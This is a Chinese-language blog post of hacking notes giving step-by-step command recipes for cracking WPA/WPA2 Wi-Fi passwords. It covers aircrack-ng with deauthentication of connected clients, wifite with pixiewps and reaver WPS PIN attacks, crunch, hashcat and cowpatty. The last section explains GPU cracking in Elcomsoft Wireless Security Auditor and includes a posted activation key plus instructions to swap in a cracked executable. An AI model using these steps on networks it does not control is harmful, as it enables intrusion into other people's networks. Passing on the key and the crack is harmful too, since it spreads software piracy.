多种方式进行WPA破解与跑握手包

作者：颖奇L'Amore Blog: [www.gem-love.com](http://www.gem-love.com/) 本文测试环境为：ESSID - iSafe\_Normal PSK - iSafe12345

0x00 前言▸

这些是我很久以前写的笔记，准备陆续发到博客上。

0x01. aircrack-ng破解WPA/WPA2▸

这方法太平常了，就不过多介绍了，不懂的自行网上搜索一下就好

airmon-ng start wlan0

现在用的还是早期版本，自大约2016起，新版本的网卡名为wlan0mon

airodump-ng mon0

airodump-ng -c [channel] –bssid [ap’s mac] -w [保存的文件名] mon0 –ignore-negative-one

aireplay-ng -0 10 -a [ap’s mac] -c [sta’s mac] –ignore-negative-one mon0

aircrack-ng -w [/root/password] [文件名-xx.cap]

0x02. 自动化破解WPA/WPA2加密▸

airmon-ng start wlan0

wifite -dict [/root/pass]

开了wps会尝试先枚举wps的pin码（新版wifite会先调用pixiewps秒破，失败的话继续reaver枚举）
然后会抓握手包跑字典等着吧… 6个小时后，WPA-PSK 和 PIN码：破解历史和密码等会记录在

/root/cracked.txt

0x03. 不指定字典情况下破解WPA/WPA2▸

顾名思义，就是用工具生成字典然后跑包（没什么卵用）

crunch 最小长度最大长度字符集 aircrack-ng xx-01.cap -e [SSID] -w -

0x04. hashcat进行跑包破解▸

aircrack-ng [抓到的cap] -J [xxx] 生成hccap

hashcat -m 2500 [xx.hccap] [字典]

如果出现下面的情况，把系统时间调回2012以前就可以了比如我调到了2000年：之后跑包就OK了

0x05. 创建Hash-table加速并用Cowpatty破解▸

方法1 直接用字典,和aircrack-ng一样，只是换了个工具:

cowpatty -f 字典 -r [捕获的报文] -s [ssid]

方法2 创建hash-table 并使用hash-table破解:

genpmk -f [/root/pass] -d [将要生成的hash-table] -s [ssid]

cowpatty -d [hash-table] -r [捕获的报文] -s [ssid]

0x06. windows下GPU跑包加速（常用）▸

网上那些10、20元跑包跑不出不收费，基本都是用的这种方法 安装说明： 1.运行ewsa_setup_en.msi，正版需要激活码，在百度找了一个（是否失效就不知道了）

EWSA-173-Z6M97-YWE1O-ZMU3P-XACLP

2.安装完成之后，不要立刻运行，而是用Lz0文件夹中的EWSA.exe替换掉安装目录下的同名文件，默认安装在C:\Program Files (x86)\Elcomsoft Password Recovery\Elcomsoft Wireless Security Auditor。 3.将”简体中文.lng”这个语言包，放在安装目录下，默认放在：C:\Program Files (x86)\Elcomsoft Password Recovery\Elcomsoft Wireless Security Auditor。 4.运行程序，选择Options—Language—简体中文，即可完美汉化。 破解流程： 1.选项–CPU选项 2.选项–GPU选项 3.选项–攻击选项–新增字典（默认目录下会携带英、俄、德三文的字典），字典可以新增多个，仅限txt 4.文件–导入Tcpdump文件–选择已抓到握手包的cap文件–选择ssid 5.开始测试—字典枚举攻击如果是测试版那么将会显示iS*******，所以还是要破解的